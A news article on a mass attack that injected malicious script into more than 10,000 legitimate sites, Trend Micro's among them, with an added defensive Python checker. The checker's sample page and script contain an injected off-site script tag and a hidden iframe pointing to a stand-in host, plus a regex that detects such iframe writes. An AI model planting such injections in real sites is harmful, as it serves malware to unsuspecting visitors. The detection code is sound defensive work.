Trend Micro Victim Of Malicious Hack
Trend Micro spokesperson Mike Sweeny confirmed that several of Trend Micro's Web pages had been hacked, but said that the company had already taken corrective action to address the problem. "The pages have been fixed up and running for a couple of days now," said Sweeny. "Obviously, we're constantly hardening our sites."
"It's going to be a constant corrective action," Sweeny added. "It really shows the need for Web protection."
Trend Micro is currently investigating the Web attack. Sweeny said that so far analysis has shown that the redirect technology wasn't working properly. "If the redirect code would have worked, our Web threat protection would have blocked it," he said.
The security vendor's infected Web pages were part of a massive attack affecting more than 10,000 Web sites, which was first discovered Wednesday by researchers at McAfee Avert Labs. Attackers infected the otherwise trusted Web pages in order to install password-stealing loggers, backdoors and other types of malware on the PCs of users visiting the sites.
"The sites are .com (sites), .net (sites). Not necessarily names that people would have heard of, but also not really obscure, where people would look at the domain and say 'what's that about?'" said Craig Schmugar, threat researcher for McAfee Avert Labs.
McAfee security experts said that the attack was revealed by following the chain of malicious code after the discovery of one compromised site, leading to more sites infected with the same malicious code.
"You follow the chain, one site leading to another. One executable download leads to another," said Schmugar.
Schmugar said that the infected pages all seem to use Microsoft's Active Server Page technology, which is used by many Web development programs to create HTML pages. The attack involved injecting a script into valid Web pages to include a reference to a malicious .JS file. The .JS file uses script to write an IFRAME, which loads a malicious HTML file that attempts to exploit several vulnerabilities in programs that use ActiveX controls such as RealPlayer, Baofeng Storm, Xunlei Thunder DapPlayer and Ourgame GLWorld Global Link Chat. Schmugar said that at least one of the payload Trojans targets online games.
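A site owner can check for the two markers described above: a script reference pointing off-site, and script that writes an IFRAME. The following is an added example, not code from the article or from McAfee; the host names, allowlist and sample page are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist: hosts this (hypothetical) site legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"www.example.com", "static.example.com"}

# Constructed sample page: one legitimate relative script, one injected off-site reference.
PAGE = """<html><head><title>Products</title>
<script src="/js/menu.js"></script>
</head><body>
<p>Welcome</p><script src="http://injected.example.net/m.js"></script>
</body></html>"""

# Constructed sample of a .JS body that writes a hidden IFRAME.
JS_BODY = ("document.write(\"<iframe src='http://injected.example.net/x.htm' "
           "width=0 height=0></iframe>\");")


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)


def offsite_scripts(html, allowed_hosts):
    """Return script URLs whose host is not in the allowlist (relative URLs are same-site)."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    flagged = []
    for src in collector.sources:
        host = urlparse(src).hostname  # None for relative paths such as /js/menu.js
        if host is not None and host.lower() not in allowed_hosts:
            flagged.append(src)
    return flagged


# Matches a plain document.write / writeln call that emits an <iframe>; obfuscated script will not match.
IFRAME_WRITE = re.compile(r"document\.write(?:ln)?\s*\([^)]*<\s*iframe", re.I | re.S)


def writes_iframe(js_source):
    """True if the script text writes an IFRAME into the page."""
    return bool(IFRAME_WRITE.search(js_source))
```

Run against every rendered page and every script file the site serves, this flags references that were not in the deployed code; a hit still needs a manual look at where the reference came from.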
Security experts say that this particular series of attacks is part of a growing trend of malware threats that use legitimate Web sites to host malicious code and infect PCs unbeknownst to the users. Similar attacks have been observed in the past -- the most famous being last year's Super Bowl attack on the Miami Dolphins Stadium Web site. That attack was later connected with SQL injection as the method attackers used to inject malicious code.
"The takeaway is, don't visit untrusted sites. But these sites or the users who frequent them are trusted. It's really about being skeptical about the content you visit," said Schmugar. "If you had kept software up to date, running desktop firewall, you would be protected from this attack."